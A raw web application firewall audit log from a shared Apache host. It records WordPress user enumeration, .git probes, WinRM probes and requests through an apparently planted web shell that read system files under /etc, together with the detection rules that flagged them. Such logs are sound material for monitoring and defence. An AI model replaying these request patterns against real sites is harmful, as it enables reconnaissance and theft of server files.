[file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/nginx/nginx.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/nginx/nginx.conf found within ARGS:viewfile: /etc/nginx/nginx.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5BDz8QAuiw8zL7QHNc0wAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1749958927587543 4308 (- - -) Stopwatch2: 1749958927587543 4308; combined=2233, p1=408, p2=1676, p3=34, p4=36, p5=79, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e0ec352b-Z-- --45b7a477-A-- [15/Jun/2025:09:20:28.567830 +0530] aE5DBDFgOBdCCkiALVsU4QAAAAA 172.71.103.196 59756 127.0.0.1 7081 --45b7a477-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.getcalley.com X-Real-IP: 172.71.103.196 X-Forwarded-For: 45.94.31.111 Connection: close cf-ray: 94ff1a7a9e18b8fa-AMS cdn-loop: cloudflare; loops=1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 accept-encoding: gzip, br x-forwarded-proto: https cf-ipcountry: NL cf-connecting-ip: 45.94.31.111 cf-visitor: {"scheme":"https"} --45b7a477-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.2.28 X-Robots-Tag: noindex Link: <https://www.getcalley.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Vary: Origin,Accept-Encoding Content-Encoding: gzip Content-Length: 124 Connection: close Content-Type: application/json; charset=UTF-8 --45b7a477-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.getcalley.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.getcalley.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.getcalley.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE5DBDFgOBdCCkiALVsU4QAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/getcalley.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749959428319011 248911 (- - -) Stopwatch2: 1749959428319011 248911; combined=1977, p1=349, p2=1526, p3=0, p4=0, p5=102, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --45b7a477-Z-- --ad80ad1e-A-- [15/Jun/2025:09:22:50.543315 +0530] aE5DkLEfOI5jz-ckSxSlvAAAAAg 34.32.129.254 52274 127.0.0.1 7081 --ad80ad1e-B-- GET /.git/config HTTP/1.0 Host: www.retaxis.com X-Real-IP: 34.32.129.254 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: gzip --ad80ad1e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Set-Cookie: _sfs_id=d969fcce7b15116aeb2c56bf1be338bf1749959569; expires=Sun, 15 Jun 2025 04:52:49 GMT; Max-Age=3600; path=/; secure; HttpOnly Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 13614 Connection: close Content-Type: text/html; charset=UTF-8 --ad80ad1e-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.retaxis.com"] [uri "/.git/config"] [unique_id "aE5DkLEfOI5jz-ckSxSlvAAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/retaxis.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749959568926725 1616662 (- - -) Stopwatch2: 1749959568926725 1616662; combined=1718, p1=473, p2=1159, p3=0, p4=0, p5=86, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ad80ad1e-Z-- --53a72c37-A-- [15/Jun/2025:09:24:31.818671 +0530] aE5D9z9o8tFLnaQ0S_5A3AAAAAQ 3.209.174.110 53962 127.0.0.1 7081 --53a72c37-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/security&viewfile=//etc/security/pam_env.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 3.209.174.110 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --53a72c37-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4377 Connection: close Content-Type: text/html; charset=UTF-8 --53a72c37-H-- Message: Warning. Matched phrase "etc/security/pam_env.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/pam_env.conf found within ARGS:viewfile: /etc/security/pam_env.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/security/pam_env.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/pam_env.conf found within ARGS:viewfile: /etc/security/pam_env.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5D9z9o8tFLnaQ0S_5A3AAAAAQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1749959671815104 3642 (- - -) Stopwatch2: 1749959671815104 3642; combined=1930, p1=310, p2=1500, p3=33, p4=32, p5=55, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --53a72c37-Z-- --51f6ab4c-A-- [15/Jun/2025:09:47:28.352999 +0530] aE5JVxBbAfjIOuFq7focJAAAAAw 2.58.56.113 60520 127.0.0.1 7081 --51f6ab4c-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.csquaretech.com X-Real-IP: 2.58.56.113 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 --51f6ab4c-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.2.28 X-Robots-Tag: noindex Link: <https://www.csquaretech.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --51f6ab4c-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.csquaretech.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.csquaretech.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.csquaretech.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE5JVxBbAfjIOuFq7focJAAAAAw"] Apache-Handler: proxy:unix:/var/www/vhosts/system/csquaretech.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749961047362766 990308 (- - -) Stopwatch2: 1749961047362766 990308; combined=2302, p1=381, p2=1814, p3=0, p4=0, p5=106, sr=133, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --51f6ab4c-Z-- --419da82c-A-- [15/Jun/2025:09:50:53.125230 +0530] aE5KI_ZLNtGrhJkyGMO0gAAAAAs 52.169.12.179 46710 127.0.0.1 7081 --419da82c-B-- GET /images/stories/admin-post.php HTTP/1.0 Host: www.thecreatorpreneur.in X-Real-IP: 52.169.12.179 X-Accel-Internal: /internal-nginx-static-location Connection: close Cookie: wordpress_test_cookie=WP%20Cookie%20check --419da82c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.thecreatorpreneur.in/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 --419da82c-H-- Message: Warning. String match ".php" at REQUEST_FILENAME. [file "/etc/apache2/modsecurity.d/rules/comodo_free/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||www.thecreatorpreneur.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. String match ".php" at REQUEST_FILENAME. [file "/etc/apache2/modsecurity.d/rules/comodo_free/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||www.thecreatorpreneur.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] [hostname "www.thecreatorpreneur.in"] [uri "/images/stories/admin-post.php"] [unique_id "aE5KI_ZLNtGrhJkyGMO0gAAAAAs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/thecreatorpreneur.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749961251879357 1245934 (- - -) Stopwatch2: 1749961251879357 1245934; combined=1921, p1=305, p2=1529, p3=0, p4=0, p5=87, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --419da82c-Z-- --5474660c-A-- [15/Jun/2025:09:52:08.741969 +0530] aE5KcIKElVYIQOeoN3_wlgAAAA0 98.82.63.147 32792 127.0.0.1 7081 --5474660c-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/default&viewfile=//etc/default/grub HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 98.82.63.147 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --5474660c-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3648 Connection: close Content-Type: text/html; charset=UTF-8 --5474660c-H-- Message: Warning. Matched phrase "etc/default/grub" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/default/grub found within ARGS:viewfile: /etc/default/grub"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/default/grub" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/default/grub found within ARGS:viewfile: /etc/default/grub"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5KcIKElVYIQOeoN3_wlgAAAA0"] Apache-Handler: application/x-httpd-php Stopwatch: 1749961328737826 4196 (- - -) Stopwatch2: 1749961328737826 4196; combined=2115, p1=420, p2=1557, p3=43, p4=36, p5=58, sr=143, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5474660c-Z-- --186aef6b-A-- [15/Jun/2025:09:53:08.342039 +0530] aE5KrJX6T5jLdIl-tq4kOQAAAAM 34.231.45.47 37246 127.0.0.1 7081 --186aef6b-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/init.d&viewfile=//etc/init.d/procps HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 34.231.45.47 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --186aef6b-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3519 Connection: close Content-Type: text/html; charset=UTF-8 --186aef6b-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/procps"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5KrJX6T5jLdIl-tq4kOQAAAAM"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/procps"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5KrJX6T5jLdIl-tq4kOQAAAAM"] Apache-Handler: application/x-httpd-php Stopwatch: 1749961388338012 4078 (- - -) Stopwatch2: 1749961388338012 4078; combined=2080, p1=362, p2=1565, p3=33, p4=35, p5=84, sr=96, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --186aef6b-Z-- --ef782369-A-- [15/Jun/2025:09:57:42.276620 +0530] aE5LvT9o8tFLnaQ0S_5D9wAAAAQ 66.249.72.130 43988 127.0.0.1 7081 --ef782369-B-- POST /?ob=open-bridge/events HTTP/1.0 Host: www.retaxis.com X-Real-IP: 66.249.72.130 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 420 Accept-Language: en-US Content-Type: text/plain;charset=UTF-8 Cookie: _fbp=fb.1.1749945600189.317710456919341929 Origin: https://www.retaxis.com Referer: https://www.retaxis.com/why-you-should-be-starting-an-online-marketplace/?nonamp=1 Accept: */* From: googlebot(at)googlebot.com User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Accept-Encoding: gzip, deflate, br --ef782369-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.2.28 Vary: Origin,Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: https://www.retaxis.com Access-Control-Allow-Credentials: true Access-Control-Max-Age: 86400 Set-Cookie: _sfs_id=46eabff6585fb13ef56d481d6c6086ca1749961661; expires=Sun, 15 Jun 2025 05:27:41 GMT; Max-Age=3600; path=/; secure; HttpOnly Set-Cookie: PHPSESSID=0bs0qfodkg70q7sqe2opobbs27; expires=Sat, 13 Sep 2025 04:27:42 GMT; Max-Age=7776000; path=/; domain=www.retaxis.com; HttpOnly; SameSite=lax Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --ef782369-E-- --ef782369-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.retaxis.com"] [uri "/"] [unique_id "aE5LvT9o8tFLnaQ0S_5D9wAAAAQ"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "www.retaxis.com"] [uri "/index.php"] [unique_id "aE5LvT9o8tFLnaQ0S_5D9wAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/retaxis.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749961661312101 964623 (- - -) Stopwatch2: 1749961661312101 964623; combined=2583, p1=467, p2=1841, p3=115, p4=36, p5=124, sr=114, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ef782369-Z-- --586f3a09-A-- [15/Jun/2025:10:00:38.160596 +0530] aE5MbjFgOBdCCkiALVsYqQAAAAA 185.177.72.104 46634 127.0.0.1 7080 --586f3a09-B-- GET /.git/HEAD HTTP/1.0 Host: zen-noether.198-71-51-75.plesk.page X-Real-IP: 185.177.72.104 Connection: close Accept-Encoding: gzip --586f3a09-F-- HTTP/1.1 404 Not Found Content-Length: 281 Connection: close Content-Type: text/html; charset=iso-8859-1 --586f3a09-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "zen-noether.198-71-51-75.plesk.page"] [uri "/.git/HEAD"] [unique_id "aE5MbjFgOBdCCkiALVsYqQAAAAA"] Stopwatch: 1749961838156794 3863 (- - -) Stopwatch2: 1749961838156794 3863; combined=2344, p1=523, p2=1683, p3=25, p4=35, p5=78, sr=138, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --586f3a09-Z-- --e1599c46-A-- [15/Jun/2025:10:17:12.001720 +0530] aE5QTw2pbpddt_O7FYyxvQAAAAc 101.251.238.172 56908 127.0.0.1 7080 --e1599c46-B-- POST /wsman HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 101.251.238.172 Connection: close Content-Length: 0 Authorization: Negotiate TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAGAbEdAAAADw== Content-Type: application/soap+xml;charset=UTF-8 User-Agent: Microsoft WinRM Client --e1599c46-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --e1599c46-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||198.71.51.75|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|198.71.51.75|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||198.71.51.75|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/wsman"] [unique_id "aE5QTw2pbpddt_O7FYyxvQAAAAc"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|198.71.51.75|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "198.71.51.75"] [uri "/wsman"] [unique_id "aE5QTw2pbpddt_O7FYyxvQAAAAc"] Stopwatch: 1749962831998172 3594 (- - -) Stopwatch2: 1749962831998172 3594; combined=2218, p1=485, p2=1571, p3=24, p4=25, p5=113, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e1599c46-Z-- --99680706-A-- [15/Jun/2025:10:17:15.204653 +0530] aE5QUxmnVjDRYaxdCWSpAQAAAAY 101.251.238.172 56916 127.0.0.1 7080 --99680706-B-- POST /wsman HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 101.251.238.172 Connection: close Content-Length: 198 Content-Type: application/soap+xml;charset=UTF-8 User-Agent: Microsoft WinRM Client WSMANIDENTIFY: unauthenticated --99680706-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --99680706-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||198.71.51.75|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|198.71.51.75|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||198.71.51.75|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/wsman"] [unique_id "aE5QUxmnVjDRYaxdCWSpAQAAAAY"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|198.71.51.75|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "198.71.51.75"] [uri "/wsman"] [unique_id "aE5QUxmnVjDRYaxdCWSpAQAAAAY"] Stopwatch: 1749962835201407 3327 (- - -) Stopwatch2: 1749962835201407 3327; combined=2078, p1=454, p2=1451, p3=38, p4=24, p5=111, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --99680706-Z-- --2b25540a-A-- [15/Jun/2025:10:22:44.002700 +0530] aE5Rmy7IKUqG672kqSysTAAAAAg 34.168.214.168 48558 127.0.0.1 7081 --2b25540a-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.csquaretech.com X-Real-IP: 34.168.214.168 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 --2b25540a-F-- HTTP/1.1 401 Unauthorized 